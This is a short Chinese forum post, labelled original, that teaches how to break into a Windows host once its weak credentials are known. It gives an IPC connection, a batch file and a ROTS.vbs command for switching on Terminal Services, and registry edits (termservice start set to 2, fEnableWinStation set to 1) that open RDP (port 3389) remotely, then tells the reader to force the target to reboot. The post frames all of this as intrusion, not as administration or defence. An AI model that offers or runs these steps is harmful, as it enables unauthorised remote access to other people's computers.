[原创]当你扫描到一台有弱口令的主机后````````
| 发这个贴子只是为了让一些人知道如果利用弱口令入侵一台主机。有很多朋友得到了口令也不会利用``比如IPC链接``一些NET命令不太熟悉```
我提供下面的参考```是高手的就跳过:
比如现在有一台主机``用户名和密码都知道了``你可以用IPC链接``
然后我们利用注册表替他开3389,当然可以利用批处理文件3389.bat,传到主机目录执行```
附BAT文件参数
{echo [Components] > c:\sql
echo TSEnable = on >>
}
c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
也可以利用rots.vbs文件来执行````
rots.vbs格式如下:
{cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [r或者fr]}
我们现在来通过注册表执行
点击开始->运行->regedit
点击工具栏的连接网络注册表
找到下面的键值
HKEY_LOCAL_MACHINE\SYSTEM\Current Controlset\services\termservice 下的start值改为2
HKEY_LOCAL_MACHINE\system\current controlset\control\terminal server\winstations\RDP-Tcp 下的fenablewinstation改为1
然后等待主机重起就可以了``如果等得不耐烦的话就用shutdown工具重起主机````
|
